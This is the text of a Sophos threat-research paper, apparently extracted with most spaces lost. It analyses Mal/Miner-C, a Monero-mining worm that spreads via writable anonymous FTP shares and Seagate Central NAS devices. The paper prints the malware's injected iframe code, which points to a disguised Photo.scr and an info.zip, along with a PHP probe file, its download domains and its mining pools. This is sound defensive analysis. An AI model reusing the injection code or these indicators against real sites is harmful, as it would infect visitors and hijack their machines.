cryptomining malware on nas servers - sophos papers... · cryptomining malware on nas servers a...
TRANSCRIPT
CryptominingmalwareonNASserversAcoupleofyearsago,coinminingwasabubblingstory.Thereweremanythreatsthatusedinfectedmachinestominecryptocurrenciesattheexpenseofthevictim.Miningcoinsonsomeoneelse’smachinecouldprovidetheattackerwithfreeCPUresourcesfromeachinfectedsystem,sotherewasnoneedtostealdirectlyfromthevictim.Theinfectedmachinewouldalsodelivertheblockrewardsfromtheminingoperationsintotheattacker’swallet.
Theideawasperfectfromthecriminal’spointofview,butastimewentontheaveragePCwasnolongerpowerfulenoughtomineevenasinglecoin.Itwastimetogiveuponthistypeofattackandturntheattentiontootherwaystomakemoney,likeransomware.RecentlyanewmalwarefamilyhasfoundawaytousePCsefficientlytominenewtypesofcryptocurrency.
AttilaMarosi,SeniorThreatResearcher,SophosLabs
CryptominingmalwareonNASservers
Page2of21
ContentsIntroduction...................................................................................................................................3
Monero: the cryptocoin...............................................................................................................3
Mal/Miner-C..................................................................................................................................6
The main NSIS.........................................................................................................................6
tftp.exe.......................................................................................................................................9
Interesting notes....................................................................................................................10
Telemetry of the threat..........................................................................................................11
Seagate Central.........................................................................................................................12
Moneropool: mined coins.........................................................................................................15
Let’s do some math...............................................................................................................16
References.................................................................................................................................21
CryptominingmalwareonNASservers
Page3of21
IntroductionAcoupleofyearsago,coinminingwasabubblingstory.Thereweremanythreatsthatusedinfectedmachinestominecryptocurrenciesattheexpenseofthevictim.Miningcoinsonsomeoneelse’smachinecouldprovidetheattackerwithfreeCPUresourcesfromeachinfectedsystem,sotherewasnoneedtostealdirectlyfromthevictim.Theinfectedmachinewouldalsodelivertheblockrewardsfromtheminingoperationsintotheattacker’swallet.
Theideawasperfectfromthecriminal’spointofview,butastimewentontheaveragepersonalcomputerwasnolongerpowerfulenoughtomineevenasinglecoin.Itwastimetogiveuponthistypeofattackandturntheattentiontootherwaystomakemoney,likeransomware.RecentlyanewmalwarefamilyhasfoundawaytousePCsefficientlytominenewtypesofcryptocurrency.
Monero:thecryptocoinForBitcoin,themainchallengewithminingwasthedifficulty.Asmoreblockswerediscovered,thedifficultyassociatedwithminingnewcoinsalsoincreasedexponentially.AfteracertainpointtherewasnomeasurableprofittobegainedfromminingusingpersonalPCs.[1]Asyoucanseeinthepicturebelow,thedifficultyofminingincreaseddramaticallyafter2012.
Afterthatpointin2012,miningonPCsbecameunprofitableandcriminalslostinterest,sotheygaveuptryingtousevictims’computerstomineandturnedtheirattentiontoothertypesofmalwaretomakemoney.
CryptominingmalwareonNASservers
Page4of21
AlthoughminingBitcoinsisnolongerprofitable,thereareplentyofotherdigitalcurrenciesthatarequitenewandaresignificantlylessdifficulttomine.Manyofthemhaveverygoodcryptographicprotections,whichcaneffectivelyhidetheirusers.OneofthesecryptocurrenciesisMonero.[2]
MoneroisanewdigitalcryptocurrencythatiseasiertominethanBitcoin,asyoucanseebelow.
Inthisstate,miningthistypeofcryptocurrencyisprofitable.Criminalsrecognizedthisandstartedtospreadanewmalwarepayloadthatusesinfectedmachinestominecoinsattheexpenseofthesystemowner’sCPUandGPUresources.
Basedonmytestsandinformationavailableontheinternet,today’saverageCPUcancalculate50-1500hashespersecond.Thisisnotmuchonitsown,butifhundredsorthousandsarepooledtogetheritcouldbeenoughtobeofinteresttoacriminaltoexploit.
Mostoftoday’sPCshaveadedicatedvideomodule,orequipmenttoperformvideorenderingtaskscalledaGPU.Thismodulecanincreasethenumberofhashcalculationsdramatically.
CryptominingmalwareonNASservers
Page5of21
(https://www.cryptocoinsnews.com/scrypt-mining-nvidia-gtx-750-ti/)
CryptominingmalwareonNASservers
Page6of21
Mal/Miner-C
(hash:2a5b3c07e32b3b2b0c1ef33a10685027703440ec)
Thisthreatisinterestingnotonlyforthetechniqueitusestospreadandgetnewnodestohelpcalculatehashesforthecryptocurrency,butitalsoattemptstocopyitselftoopen(orweak)FTPfoldersinthehopeofbeingexecutedonothermachines.
ThemainNSISWehaveseenmanyversionsofthisthreat.Itisdevelopedandmaintainedcontinuously,butalltheversionsseemtoshareaspecificproperty:alltheversionsaredevelopedinNSIS[6].
Containsmultipleversionsofminers:
TheNSISscriptqueriesinformationaboutthehostsystem’sCPUtype(s)andGPUcapabilitiesbeforecreatingAutoRunentriesusedforrunningitself.(NSCpuCNMine32.exe/NSCpuCNMine64.exeandNSGpuCNMine.exe)66b965d1ee4013c80f7e0e27725e43f3d316325a NsGpuCNMiner.exe fd358cfe41c7aa3aa9e4cf62f832d8ae6baa8107 NsCpuCNMiner32.exe ce1fbf382e89146ea5a22ae551b68198c45f40e4 NsCpuCNMiner64.exe
CryptominingmalwareonNASservers
Page7of21
ThemalwaredownloadsthelatestversionoftheNSISscriptfromoneofthesehosts:
§ stafftest.ru§ hrtests.ru§ profetest.ru§ testpsy.ru§ pstests.ru§ qptest.ru§ prtests.ru§ jobtests.ru§ iqtesti.ru
Theresourcesrequestedaretypicallynamed:
§ stat.html§ test.html§ text.html
Thedownloadeddocumentcontainsalistwiththeminingpoolsforwhichitwillcontribute.Inourinvestigationitseemsmoneropool.comistheprimarypoolusedbythisthreat.stratum+tcp://mine.moneropool.com:3333 stratum+tcp://xmr.hashinvest.net:1111 stratum+tcp://monero.crypto-pool.fr:3333 stratum+tcp://mine.cryptoescrow.eu:3333
Thetmp.inifilecontainsthewalletstologtheeffortoftheminingoperations.Theminingpoolwillcountandfinallysendpaymenttotheseaccounts:
TheresourceswhicharedownloadedatruntimeareobfuscatedbyROT47withacustomcharacterset.
CryptominingmalwareonNASservers
Page8of21
Forexample,thestat.htmlfileoriginallylookslikethis:
Afterdecoding:
Thismethodgivesthecriminalsanopportunitytoupdatethemalwareeachtimeitisstarted.Sinceitgeneratesanewinitializationfilewhenitislaunched,ithelpsthemalwareavoidsecuritysolutions.Italsogivesthebotnetoperatorsachancetochangethepayloadofthethreatinthefuture,forexample,droppingransomwaretothevictim’smachineaftertheminingbusinessisnolongerprofitable.
CryptominingmalwareonNASservers
Page9of21
tftp.exeInterestingly,notalltheinstancesofthemalwarecontainthetftp.exefile.23ec304fab33af1cacf0a167aeb7465631286128 tftp.exe
ThisexecutablejustrandomlygeneratesIPaddressesandtriestologin.Ithasanembeddedlistofusernamesandpasswordsthatitusestotrytogainaccess.
It’sakindofworm:ifahostgetsinfected,itnotonlyservesitsownerbyminingdigitalcurrency,butitalsotriestoinfectothersystemsviaFTPservices.
IftheembeddedcredentialsareabletosuccessfullyconnecttoanFTPservice,ittriestocopyitselftotheserverandmodifyanexistingweb-relatedfilewiththeextension.htmor.phpinanattempttofurtherinfectvisitorstothehostsystem.
Ifafilewiththisextensionisfound,thethreatinjectssourcecodethatcreatesaniFramereferencingthefilesinfo.ziporPhoto.scr.
CryptominingmalwareonNASservers
Page10of21
Ifsomeoneopensapageinfectedlikethis,thepagewillpopupa“savefile”dialog.Thiskindofsocialengineeringisneededtoexecutethisthreat,asitcannotinfectmachinesautomatically,butitbringthethreatveryclosetothevictim.Ultimatelythisthreatneedstheusertoclickorrunthefileinorderforthenewsystemtobecomeinfected.
Thiswillbefurtherdescribedattheendofthispaper.Sincethisactionisnoisy,themajorityofpotentialdevicesthatcouldbeinfectedinthiswayhavealreadybeeninfected.Afteratime,thecriminalsbehindthisthreatmayopttonotspreadthis“tool”withmalware,asitmayproveineffectiveasamechanismforinfectingadditionalsystems.
InterestingnotesThereisascanner-orhacker-relatedservicethatIhavenodetailedinformationon,butIhaveobservedmanytimeswithinthelastyear.Itinvolvesplacingafileonthedevicewiththenamew0000000t.php.
Thisfilecontains:<?php echo base64_decode("bm9wZW5vcGVub3Bl"); ?>
Ifthefileuploadwassuccessful,requestingthisdocumentashttp://xxx.xxx.xxx.xxx/w0000000t.phpwouldresultinthefollowingresponse:nopenopenope
Thisprovidestheattackerwithproofofcodeexecutioncapabilitiesonthehost.
WhilesearchingforMal/Miner-C,wefoundmanyhostsidentifiedwiththismethod,indicatingthatthehostwasmostlikelycompromisedmorethanonce.Onthefirstoccasion,w0000000t.phpwasdeployed.Later,Mal/Miner-Cmayhavebeendeployedusingtheknowledgeofthehost’sabilitytoexecutecodeonthedevicebyinjectingtheiFrame.<?php echo base64_decode("bm9wZW5vcGVub3Bl"); ?> <iframe src=ftp://ftp:[email protected]//info.zip width=1 height=1 frameborder=0> </iframe> <iframe src=Photo.scr width=1 height=1 frameborder=0> </iframe>
CryptominingmalwareonNASservers
Page11of21
ThehighlightedcredentialwasusedinthiscasebyMal/Miner-Ctouploadaninstanceofinfo.zip,Photo.scpaswellasinfectthe.phpfile.
TelemetryofthethreatInthefirst6monthsofthisyearwecounted1,702,476individualinstancesofthisthreat.However,thenumberofuniqueIPaddressescorrespondingtotheseinstanceswasonly3,150.Thereasonforthisissimple:ThethreatistryingtologintoFTPserviceswithembeddedcredentials(anonymous,root,admin,etc)withdefaultandfrequentlyusedweakpasswords.Ifsuccessful-andtheaccounthaswriteaccesswithusingtheFTPservice-theywillcopyPhoto.scrandinfo.ziptoeachfolderrecursively.Thus,ifasingleFTPserverisinfected,itisinfectedwithmultipleinstances.
CryptominingmalwareonNASservers
Page12of21
SeagateCentral
ThisthreatisnottargetingtheSeagateCentraldevicespecifically;however,thedevicehasadesignflawthatallowsittobecompromised.Mostallofthesedeviceshavealreadybeeninfectedbythisthreat.
ThisishowtheSeagateCentraldeviceseparatedtheprivateandpublicfolders.
(Seagateprivateandpublicfolderconception)
CryptominingmalwareonNASservers
Page13of21
Asyoucansee,thedevicecanfacilitatemultiplelevelsofaccesses,includingmanyprivateaccountsaswellasabuiltinpublicaccount.Ifyoureadthemanualcarefully,youwillfindasetofpropertieslikethis:
§ BydefaulttheNASsystemprovidesapublicfolderforsharingdata.Thispublicfolderandaccountcannotbedeletedordeactivated.
§ Forprivatedata,onemustcreateusersandeachuserwillhaveassociatedfoldersandindividuallogincredentialsforthem.
§ Theadminuserhastheabilitytoenablethedeviceforremoteaccessorturnthisfeatureoffentirely.
§ Ifthedeviceisenabledforremoteaccess,alltheaccountswillbeavailableonthedevice,includingtheanonymoususer.Inthisstate,yourdeviceisopenforanyonetowritetoyourpublicfolder.
§ Note:Thedevicecanbeusedtostreamyourmediacontentfromaremotelocation,onlythepublicfoldercontentcanbestreamedinthisway.Manyotherfeaturesareonlyavailablefromthepublicfolder.Isuspectthatthisisoneofthereasonswhysomuchpersonaldataresidesinthepublicfolderasusersdonotswitchbetweenfolders.Theyutilizetheonewhichprovidesthemthemostflexibilityandfunctionality,andinmostcasesthatisthepublicone.
IfwelogintoaSeagateCentral,wewillseesomethinglikethis:
CryptominingmalwareonNASservers
Page14of21
ThereisafolderPhotosandafilePhoto.scr(sadly,mostoftheWindowsmachinesfileextensionsarenotdisplayed),anditalsohasadeceptiveiconthatisintendedtolooklikeatypicalWindowsfoldericon.
Anyonecouldbeeasilymisledtodoubleclickonthefileandcausetheprogramtobeginexecutiononthemachine.
Turningofftheremoteaccesscanpreventtheinfection,butalsomeanswelosetheabilitytoaccessthedeviceremotely.
CryptominingmalwareonNASservers
Page15of21
Moneropool:minedcoinsMoneropoolisaminingcommunitytomineMonerocryptocurrency.Itbasedonaminingframeworkcallednode-cryptonote-pool.
([7]https://moneropool.com/)
Luckily,ifyouknowthehashofthewalletyoucangetareportabouttheactivitiesofit.ThemostinterestingpartofthisreportistheTotalPaidandtheHashRate.Thehashrateisanaccumulatedvalue.Usingthiswecancalculatehowmanycoinscanbeminedinaday.
CryptominingmalwareonNASservers
Page16of21
TheTotalPaidisthemoneythatthecriminalsalreadyget,therealprofitofthenetwork.
Wealsogetthepaymenthistory,butwiththistechnologythereisnowaytotrackthepayments,whichisoneoftheprimaryfeaturesofthiscryptocurrency.
(addressinformation)
Let’sdosomemathBecausetheminingpoolsitesharesmuchofthisinformationandweknowthewalletaddressescollectingtherewards,wecandosomecalculationsaboutthenetworkanddiscoverwhatwas“mined”byit.
CryptominingmalwareonNASservers
Page17of21
Herearetheknownwallethashes:
LuckilytheframeworkusedbyMoneropool(node-cryptonote-pool)[3]hasagoodAPIinterfaceanddatacanbequeriedeasily:curl 'https://api.moneropool.com/stats_address?address=4ASTnar5DSKjPW6kD5D5wm4Ha9abEeUU2ik2D3KwBxTV88iV5AHTraxLpAU4ZGbzneh4ohNCjX1LBZYPtuzN3xKxGrtrU2g&longpoll=true' | python -m json.tool
Theresult:
Inthiscase,usingonlyonewalletaddress,theminingpoolsent4913,5XMRcryptocoinstothecriminal’swallet.AtthemomentoftheHTTPrequest,theaccumulatedhashrateoftheinfectedmachineswas33,370hashespersecond.
Ifweiterateallthewalletaddressesandcalculatethefullpowerofthenetwork,thenaddthemoneytheyhavealreadymined,wegetthis:
moneropool.comhaspaid58,577XMRtothem.AtthetimeofthecalculationtheexchangeratefromXMTtoEURis1.3EUR.
CryptominingmalwareonNASservers
Page18of21
([4]https://www.coingecko.com/en/price_charts/monero/eur)
Withtheexchangerateatthetimeitwasworth76,599EUR.
Furthermore,thenetworkoftheinfectedmachineshasanaccumulatedpowertocalculate431,000hashespersecond.Accordingtothecalculatorofthesite,itisenoughtomine327.7XMReachday.
Usingthesamemethodasbefore,wecanestimatethattheyearnapproximately428EUReachday.
Oneinterestingfinalnote:Theentiremonorepool.compoolhas861,000hashespersecondaccumulatedatthisrate.Andthenetworkoftheinfectedmachineshas431,000hashespersecond,whichmeansroughlyhalfofthetotalpooldoingtheminingisdoingsounintentionallyviainfectedsystems.
HereiswhatthefullMonerominingcommunitylookslike:2.5%ofthewholeminingcapacitycomesfrominfectedmachines.
CryptominingmalwareonNASservers
Page19of21
AnonymousFTPswithwriteaccessInthiscase,Mal/Miner-Cusedaverysimpleandwell-knownconfigurationmistaketospreaditselfallovertheworld.Wedecidedtoseejusthowmanyhomesandsmallbusinesseshadvulnerabledevicesbyscanningtheinternettolookforthem.
First,weusedasearchenginecalledCensystoenumeratejustunder3millionFTPserversworldwide.Thenwefedthislistintoascanningscriptthat:
• TriedtoconnectanonymouslytotheFTPservice.• Ifallowed,retrievedadirectorylistingfromthedevice(toprovideanindicationof
compromisebasedonfilenames).• Ifallowed,testedtoseeifwriteaccesswaspermitted.
Theresultswereasfollows:�
• IPnumbersofFTPserversonoriginallist:2,932,833• FTPserversactiveduringthetest:2,137,571• Activeserversallowinganonymousremoteaccess:207,110• Activeserverswherewriteaccesswasenabled:7,263• ServerscontaminatedwithMal/Miner-C:5,137
CryptominingmalwareonNASservers
Page20of21
�
Morethan70%oftheserverswherewriteaccesswasenabledhadalreadybeenfound,visitedand"borrowed"bycrookslookingforinnocent-soundingrepositoriesfortheirmalware.�
Ifyou'veeverassumedthatyou'retoosmallandinsignificanttobeofinteresttocybercriminals,andthusthatgettingsecuritysettingsrightisonlyreallyforbiggerorganizations,thisshouldconvinceyouotherwise.�
Verybluntlyput,ifyou'renotpartofthesolution,you'reverylikelytobecomepartoftheproblem.
CryptominingmalwareonNASservers
Page21of21
References[1]http://theconversation.com/bitcoin-mining-is-about-to-become-a-lot-less-profitable-58302
[2]https://en.wikipedia.org/wiki/Monero_(cryptocurrency)
[3]https://github.com/zone117x/node-cryptonote-pool
[4]https://www.coingecko.com/en/price_charts/monero/eur
[5]http://www.seagate.com/files/www-content/support-content/external-products/seagate-central/en-us/seagate-central-user-guide-us.pdf
[6]https://en.wikipedia.org/wiki/Nullsoft_Scriptable_Install_System
[7]https://moneropool.com/